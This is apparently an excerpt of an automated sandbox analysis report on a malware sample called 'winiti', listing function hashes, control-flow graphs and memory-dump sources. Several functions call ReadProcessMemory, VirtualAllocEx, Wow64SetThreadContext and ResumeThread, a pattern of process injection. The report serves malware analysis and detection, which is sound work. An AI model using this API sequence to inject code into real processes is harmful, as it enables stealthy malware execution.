                              • Instruction ID: 9bb1eedc753589d8378f711c20a11684098a598ce767995020c1513c7c227e72
                              • Opcode Fuzzy Hash: bae939feb2147241e86e9dc51a8e6b53968aecc98fbb4985c702772e60c8e691
                              • Instruction Fuzzy Hash: DE4189B5D012589FCF00CFA9D984AEEFBF1BB49310F20942AE814B7250D775AA55CF64
                              Function 005938AA Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 620 5938aa-593978 ReadProcessMemory 623 59397a-593980 620->623 624 593981-5939d3 620->624 623->624
                              APIs
                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00593962
                              Memory Dump Source
                              • Source File: 00000005.00000002.367047125.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_590000_winiti.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: d9ae83efb472994ff4cbd03cc5f6c818c2625161647f02d2ba6d2d27874a9a07
                              • Instruction ID: 8e62f3064c0dc0f57921c212efa9def05046c22106863d252a6522a1913dedeb
                              • Opcode Fuzzy Hash: d9ae83efb472994ff4cbd03cc5f6c818c2625161647f02d2ba6d2d27874a9a07
                              • Instruction Fuzzy Hash: D041A6B5D002589FCF10CFA9D884AEEFBB1BF49310F20902AE815B7200D375AA56CF64
                              Function 005938B0 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 629 5938b0-593978 ReadProcessMemory 632 59397a-593980 629->632 633 593981-5939d3 629->633 632->633
                              APIs
                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00593962
                              Memory Dump Source
                              • Source File: 00000005.00000002.367047125.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_590000_winiti.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: 7ce729f11eb0b324873dfca532dca7817571840ee9d8083083ea4397c14e179f
                              • Instruction ID: bee7e430c30c0e0e96808b3507e632920210dad7d5d2e966cd524202e267b141
                              • Opcode Fuzzy Hash: 7ce729f11eb0b324873dfca532dca7817571840ee9d8083083ea4397c14e179f
                              • Instruction Fuzzy Hash: FA4196B5D00258DFCF10CFA9D884AEEFBB1BB49310F20942AE815B7250D775AA46CF65
                              Function 00593622 Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 638 593622-5936e8 VirtualAllocEx 641 5936ea-5936f0 638->641 642 5936f1-59373b 638->642 641->642
                              APIs
                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 005936D2
                              Memory Dump Source
                              • Source File: 00000005.00000002.367047125.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_590000_winiti.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 76c542d2a368fa03255d3c13bb2b751470223a6efa04d971aa633f2bd972df3a
                              • Instruction ID: 100d30f0fd675dfbdede1576adaabcdef335d27bcabc67391458c81f3a1f1da0
                              • Opcode Fuzzy Hash: 76c542d2a368fa03255d3c13bb2b751470223a6efa04d971aa633f2bd972df3a
                              • Instruction Fuzzy Hash: 0C4199B9D002589FCF10CFA9D884AEEFBB1FB49310F20942AE815B7210D735AA16CF55
                              Function 00593628 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 647 593628-5936e8 VirtualAllocEx 650 5936ea-5936f0 647->650 651 5936f1-59373b 647->651 650->651
                              APIs
                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 005936D2
                              Memory Dump Source
                              • Source File: 00000005.00000002.367047125.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_590000_winiti.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: e402f457bac8690f9936ab5309a4c00d1c5e88454436be1f08feab7b612a9778
                              • Instruction ID: cc8a901e05f9c600984fe9a7903b89fe9e94eb5269fce525872d7081fb4de113
                              • Opcode Fuzzy Hash: e402f457bac8690f9936ab5309a4c00d1c5e88454436be1f08feab7b612a9778
                              • Instruction Fuzzy Hash: 60418AB5D00258DBCF10CFA9D984AEEFBB1FB49310F20941AE814B7210D775AA15CF55
                              Function 005934F6 Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 656 5934f6-593558 658 59355a-59356c 656->658 659 59356f-5935bd Wow64SetThreadContext 656->659 658->659 661 5935bf-5935c5 659->661 662 5935c6-593612 659->662 661->662
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 005935A7
                              Memory Dump Source
                              • Source File: 00000005.00000002.367047125.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_590000_winiti.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: 50f72fdfad9916fe7ed288a0e3282720c090a5d9cef02a96fb3fae4cb7259933
                              • Instruction ID: de8aa497908cba697b098c557cfaae252fdc4aec74fb482f4c8b22424f47e68c
                              • Opcode Fuzzy Hash: 50f72fdfad9916fe7ed288a0e3282720c090a5d9cef02a96fb3fae4cb7259933
                              • Instruction Fuzzy Hash: 5641ABB5D01258DFDF10CFA9D884AEEBBB1BF89314F24802AE419B7250D778AA45CF54
                              Function 005934F8 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 667 5934f8-593558 669 59355a-59356c 667->669 670 59356f-5935bd Wow64SetThreadContext 667->670 669->670 672 5935bf-5935c5 670->672 673 5935c6-593612 670->673 672->673
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 005935A7
                              Memory Dump Source
                              • Source File: 00000005.00000002.367047125.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_590000_winiti.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: f0943e53ab43a0c54485e5902db096fd63472ccbf89bb5ea0c2609d4021e9950
                              • Instruction ID: 6214b6bbade416e998ac4aa66b292cd9a47582bead636b34d4c32332743d1ba4
                              • Opcode Fuzzy Hash: f0943e53ab43a0c54485e5902db096fd63472ccbf89bb5ea0c2609d4021e9950
                              • Instruction Fuzzy Hash: 9241ABB5D00258DFDF10CFA9D884AEEBBB1BF89314F24802AE418B7250D778AA45CF54
                              Function 00593408 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 678 593408-59349c ResumeThread 681 59349e-5934a4 678->681 682 5934a5-5934e7 678->682 681->682
                              APIs
                              • ResumeThread.KERNELBASE(?), ref: 00593486
                              Memory Dump Source
                              • Source File: 00000005.00000002.367047125.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_590000_winiti.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 09f266644af9def283ac9ad2b709e10acdd7d89e8ff5d4d7f5cd0f6e297d64de
                              • Instruction ID: 43d6f6b41be90735d27c71f421eb53e05a3ed9649b25de7c4e383f9ea5443c16
                              • Opcode Fuzzy Hash: 09f266644af9def283ac9ad2b709e10acdd7d89e8ff5d4d7f5cd0f6e297d64de
                              • Instruction Fuzzy Hash: 8831AAB4D002189FDF10CFA9D984AAEFBB5BF89310F20941AE818B7300D735AA05CF94
                              Function 0018F4F8 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1070 18f4f8-18f51d 1071 18f51f 1070->1071 1072 18f524-18f539 1070->1072 1071->1072 1073 18f688-18f69a 1072->1073 1076 18f5de-18f773 1073->1076 1080 18f779-18f77a 1076->1080 1081 18f69f-18f785 1076->1081 1080->1073 1086 18f664-18f668 1081->1086 1087 18f66e-18f727 1086->1087 1088 18f5e4-18f5f0 1086->1088 1094 18f70e-18f712 1087->1094 1090 18f5f2 1088->1090 1091 18f5f7-18f61b 1088->1091 1090->1091 1101 18f621-18f622 1091->1101 1102 18f544-18f54a 1091->1102 1095 18f6de-18f6ea 1094->1095 1096 18f714-18f75e call 18e558 1094->1096 1097 18f6ec 1095->1097 1098 18f6f1-18f703 1095->1098 1096->1102 1114 18f764-18f76a 1096->1114 1097->1098 1098->1102 1101->1102 1103 18f54c 1102->1103 1104 18f553-18f554 1102->1104 1103->1104 1108 18f729-18f72d 1103->1108 1109 18f63f-18f643 1103->1109 1110 18f645-18f724 1103->1110 1104->1110 1108->1094 1109->1086 1114->1102
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID: r
                              • API String ID: 0-1812594589
                              • Opcode ID: c0a722d8bb4665dae3e8af436d672a304caa18458826f7d0b98ebdfde412f5eb
                              • Instruction ID: 0c7bad67d7306c765362aa2f04a1512e001e8830138ef920e51f455488b4a161
                              • Opcode Fuzzy Hash: c0a722d8bb4665dae3e8af436d672a304caa18458826f7d0b98ebdfde412f5eb
                              • Instruction Fuzzy Hash: 75511474D09208DBCB08EFA9D4489EDB7BAFF8D301F21D169D41AA6261D7349A82DF50
                              Function 00183299 Relevance: .2, Instructions: 214COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f36f5c56232e7e47e6304880e15c8c5c222ceeafa819a7e312bd4e6e1266e797
                              • Instruction ID: e3886174cf8be060f31dc13b76745e7183837248ae74789cf2fcaa44fe2899d6
                              • Opcode Fuzzy Hash: f36f5c56232e7e47e6304880e15c8c5c222ceeafa819a7e312bd4e6e1266e797
                              • Instruction Fuzzy Hash: 5E816D313047048FC705AB78D8946AEB7E6FFCD301F448929E55A8B365EF34AD4A8B91
                              Function 001832A8 Relevance: .2, Instructions: 207COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f7ee17c5a38efba2bb50c206df7bbe35c0519ab8c5a24eeab11450cac26136b7
                              • Instruction ID: a3188fc1c9d70580ce4d6b92d0e700309a5e0a8d3342d455263baac1f85df1d8
                              • Opcode Fuzzy Hash: f7ee17c5a38efba2bb50c206df7bbe35c0519ab8c5a24eeab11450cac26136b7
                              • Instruction Fuzzy Hash: 38815D313007048FC705AB78D8946AEB7E6FFCD300F448928E51A9B355EF34AD468B91
                              Function 0018DBE8 Relevance: .2, Instructions: 175COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bf9e5f6c6a2383d5a5ea20bea33c55a4fefa116294b5bd8e087f9166509df95e
                              • Instruction ID: 30b5530623b1b1931dbf6793a593380e661bffa2a053a3c10bc84785edf2b05f
                              • Opcode Fuzzy Hash: bf9e5f6c6a2383d5a5ea20bea33c55a4fefa116294b5bd8e087f9166509df95e
                              • Instruction Fuzzy Hash: 2C61B274E04208CFDB08DFE5D884AADFBB6BF89300F209129E519AB395DB705A45DF50
                              Function 00188C80 Relevance: .2, Instructions: 150COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 897864b441aeb6f31192ce0e54adbca612d5c9f85a5e96f2d9b42301e50b3eb3
                              • Instruction ID: 04603f992d849a08e1f240c21ce7cf95a960b6b38a197066402906d8dd1a6434
                              • Opcode Fuzzy Hash: 897864b441aeb6f31192ce0e54adbca612d5c9f85a5e96f2d9b42301e50b3eb3
                              • Instruction Fuzzy Hash: AF514674E09209CFCB08EFE8E5848FDBBB4BB0D340BA25516D81AE7355DB709A119F60
                              Function 00188C88 Relevance: .1, Instructions: 148COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 71ddf92f90ff9f72398e147b9daa98ec51191a3a8951377be4e736a66f5cf9a4
                              • Instruction ID: 9004e1edba205a346a4872642ae574269d8a2bc3657ca7b1a59fa528a98c8a6d
                              • Opcode Fuzzy Hash: 71ddf92f90ff9f72398e147b9daa98ec51191a3a8951377be4e736a66f5cf9a4
                              • Instruction Fuzzy Hash: 4A513774D09209CFCB08EFE8E5848EEBBB4BB0D340FA25516D81AE3355DB709A519F60
                              Function 00184B55 Relevance: .1, Instructions: 136COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4676af673c5e61e5ea62f9dad2c517a8cc2e2376b9e748157f7ef57ac404b971
                              • Instruction ID: 3b116255f7792b6dab0ecdfc04e97010465199aa6802e4027f8eac7d045f315a
                              • Opcode Fuzzy Hash: 4676af673c5e61e5ea62f9dad2c517a8cc2e2376b9e748157f7ef57ac404b971
                              • Instruction Fuzzy Hash: 92418F34B002148FD718AB78D858B6E7BE2EFC8300F2480A9E506EB3A5DF759D118B90
                              Function 00189801 Relevance: .1, Instructions: 131COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: abf092fe28acca075515872b51da5949eed819bae7cc831e35b45da398ce2a1c
                              • Instruction ID: 96f96205fedfc035ae940ce021b11795152ca8f97da5f51deefb880eed7f09cf
                              • Opcode Fuzzy Hash: abf092fe28acca075515872b51da5949eed819bae7cc831e35b45da398ce2a1c
                              • Instruction Fuzzy Hash: D441C274D19259DFCB18DFA9D884AFCBBB5EF4A310F286015E40AA7251C7349A81EF10
                              Function 00188B44 Relevance: .1, Instructions: 116COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2c9ac534a4d14166235cd95ef330a7babd59acd5e42747230a6123d7cac9403d
                              • Instruction ID: fdbf18c05cc47212d6377256e2a4fa8b337aa41b2eb3f883378f92dfc882c533
                              • Opcode Fuzzy Hash: 2c9ac534a4d14166235cd95ef330a7babd59acd5e42747230a6123d7cac9403d
                              • Instruction Fuzzy Hash: 38415FB0D09519CFC708EF9AD8889FDBBF8BF8D300B929495C0199B226DB319A51DF00
                              Function 00188B48 Relevance: .1, Instructions: 114COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9af8b4a8b4b1085ab917b330aa5fc1f3994d7ac16e9ee98b2341509b52a3e80f
                              • Instruction ID: 71ac71f502fa4567d7b935b39868e61b3c301fb3d9a6a644109ddc6e05a72a29
                              • Opcode Fuzzy Hash: 9af8b4a8b4b1085ab917b330aa5fc1f3994d7ac16e9ee98b2341509b52a3e80f
                              • Instruction Fuzzy Hash: 8A4150B4D09519CFD708EF9AD8889FDBBF8BF8D300B929495D0199B226DB319A50DF00
                              Function 00184980 Relevance: .1, Instructions: 111COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5038ebb905cd6fa536e95e644da87229f38efb9dc00c0cd47cee184d18b180ec
                              • Instruction ID: f4bd609877098368b771b711a277ca58a6917954356366a827b3600a094928ef
                              • Opcode Fuzzy Hash: 5038ebb905cd6fa536e95e644da87229f38efb9dc00c0cd47cee184d18b180ec
                              • Instruction Fuzzy Hash: 574186317012149FD715BB68E95976F7BA6EFC8300F10402CE506AB395DF789D468BD1
                              Function 0018AB70 Relevance: .1, Instructions: 105COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6d6b16392002598b8428381aff6b8eae833c73414c1889bf4a5834fa23b17bdf
                              • Instruction ID: 0ca4f6f916031a928ab62f5b30fa12e6c172a62fcedb81b0bf2a1a64182a4823
                              • Opcode Fuzzy Hash: 6d6b16392002598b8428381aff6b8eae833c73414c1889bf4a5834fa23b17bdf
                              • Instruction Fuzzy Hash: 9041BF31A00219DFDB44EBA8D845AAFBBB6FF88310F108065E515B7354DB349E06CFA1
                              Function 0018AB80 Relevance: .1, Instructions: 98COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3339ff46ee2488176453e8ae3b2834bede7a27988698e72a88b3620a139b594a
                              • Instruction ID: dc27a795d999e145ccf28fa276868df666799e0d1256ab63599efd4457743e4b
                              • Opcode Fuzzy Hash: 3339ff46ee2488176453e8ae3b2834bede7a27988698e72a88b3620a139b594a
                              • Instruction Fuzzy Hash: 51317031A00119DFDB44EBA8D945AAFBBB6FF88310F108025E519B7344DB349E46DFA1
                              Function 0013D1D4 Relevance: .1, Instructions: 72COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366948151.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_13d000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2bbdd1299411f77827e4c3bb347c4a6683b3cfb4f264a49e487e692899783024
                              • Instruction ID: e632e7b545b9b1ba4f4553b3887624555ae9ba5c20510ba7c30634eefdf3ac3a
                              • Opcode Fuzzy Hash: 2bbdd1299411f77827e4c3bb347c4a6683b3cfb4f264a49e487e692899783024
                              • Instruction Fuzzy Hash: 1A21D475604240EFEB05CF10F9C0B26BBA5FB84714F34C66DE8494B246C736D956CB61
                              Function 0013D01C Relevance: .1, Instructions: 72COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366948151.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_13d000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f5764ab92c129c77cbb8e798e6414cad51f62492f89f80e7547f726b4937026e
                              • Instruction ID: 9cc2b925f36a3408b3d289ce1bee96e671aec012a0e12cfe43f8a1bc6175a6b2
                              • Opcode Fuzzy Hash: f5764ab92c129c77cbb8e798e6414cad51f62492f89f80e7547f726b4937026e
                              • Instruction Fuzzy Hash: A321D475604240EFEB18CF24F8C4B16BB65EB84B14F34C569E8494B246C33AD847CBA1
                              Function 0018B2D8 Relevance: .1, Instructions: 67COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ca520a3c0e839c5d56adba47c3d6150d139a7f5bc6363d2cc961e7b6186396fe
                              • Instruction ID: 71ef8ef4eb2cbb5d81487380a1e5cf5d9dedf718c4b7770608d6a3c1b154c588
                              • Opcode Fuzzy Hash: ca520a3c0e839c5d56adba47c3d6150d139a7f5bc6363d2cc961e7b6186396fe
                              • Instruction Fuzzy Hash: 7D21D530709244AFD706EB68D855B5E7BB2AF86300F15C0E6D5099B2A2DB359E058B42
                              Function 0013D006 Relevance: .1, Instructions: 63COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366948151.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_13d000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 68e1aa16009c29124b19866519b963363fbe3a70e25f1be76005680992e83943
                              • Instruction ID: d871dea743105e443430f031e21e2595db02dc2169cc50416c2977637125661e
                              • Opcode Fuzzy Hash: 68e1aa16009c29124b19866519b963363fbe3a70e25f1be76005680992e83943
                              • Instruction Fuzzy Hash: DE217F755083809FCB06CF24E994B15BFB1EB46714F28C5DAD8498F266C33AD85ACB62
                              Function 0018E588 Relevance: .1, Instructions: 59COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ceedbeedb32d7dcb2e893fc1bb40b6175a872af867f9b4a98aca13b433b9cbf4
                              • Instruction ID: b744940c0134789b9aa3ad51e7ce2979995b510d60e7a517fbbbf668eb541c01
                              • Opcode Fuzzy Hash: ceedbeedb32d7dcb2e893fc1bb40b6175a872af867f9b4a98aca13b433b9cbf4
                              • Instruction Fuzzy Hash: A221B6B8E08209DFCB44DFA9C5809AEBBF5FB49300F619165E809A7755D730AE40DFA1
                              Function 00180918 Relevance: .1, Instructions: 57COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8f62cf47a61f3e25d0055b6d9124a49973e3b8cc2c9014cbdfcdf83ede655b64
                              • Instruction ID: 6899d2c7b0103178fe7d86167def4376003450006f2d4814b9018a1e7fba64b0
                              • Opcode Fuzzy Hash: 8f62cf47a61f3e25d0055b6d9124a49973e3b8cc2c9014cbdfcdf83ede655b64
                              • Instruction Fuzzy Hash: A811A030D06248DFDB46EFA4D990A9DBBB1EF8A300F1581DAC448A7262D7345F49CF41
                              Function 0018B2B0 Relevance: .1, Instructions: 55COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 11ebf41966cbc65fc3321e849acffd2e7c0bd7d342ff1730cc8cfe1da2ae0b56
                              • Instruction ID: ffb2def2952d0c19479f66faa29f5ca5fce9644ff05af79d0b42d26bc7ca59d8
                              • Opcode Fuzzy Hash: 11ebf41966cbc65fc3321e849acffd2e7c0bd7d342ff1730cc8cfe1da2ae0b56
                              • Instruction Fuzzy Hash: C911C27160D780DFC316AB289C55B597F22AF86300F1A80E7D5598F2A3CB249D068B42
                              Function 001893C2 Relevance: .1, Instructions: 54COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 694cffd2790fbf050efa19b51d14ab6370068db57423895aece994c87c42abc1
                              • Instruction ID: 82a5e9773c04b64885c90eaee1eb54a9d8900ec77e74304558d8ce1dc9bbaeeb
                              • Opcode Fuzzy Hash: 694cffd2790fbf050efa19b51d14ab6370068db57423895aece994c87c42abc1
                              • Instruction Fuzzy Hash: D811A374D09348CBDB08DF65C4487BDBBB9AF8A300F19906AC81A6B292D7754645DF81
                              Function 0013D1CF Relevance: .1, Instructions: 53COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366948151.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_13d000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9166c7a4dd2eec6ce831343740cf9da501b323eca94e9702a4ab88c0cd9770f2
                              • Instruction ID: 69e5766e7f0d2ba17231ef028f4892714b5800750d0f8cd06f2f63644b2e6a7a
                              • Opcode Fuzzy Hash: 9166c7a4dd2eec6ce831343740cf9da501b323eca94e9702a4ab88c0cd9770f2
                              • Instruction Fuzzy Hash: 43118B75504280DFDB12CF10E5C4B16BFB1FB84314F24C6AAE8494B656C33AD85ACFA2
                              Function 00189348 Relevance: .0, Instructions: 50COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3b2c2bd4c885fcdb94ff2c71484088a8277114ff8f98da8c134e30ecaaa473d3
                              • Instruction ID: 8f1de3ef08475f0b2cb541516055487c045db390bcafff4d30f0ea996007e0b9
                              • Opcode Fuzzy Hash: 3b2c2bd4c885fcdb94ff2c71484088a8277114ff8f98da8c134e30ecaaa473d3
                              • Instruction Fuzzy Hash: 78116D74D093448FEB09DFAAC4047B9BBBAAF8A300F159066C419AB292D7744A45CF90
                              Function 00189358 Relevance: .0, Instructions: 43COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
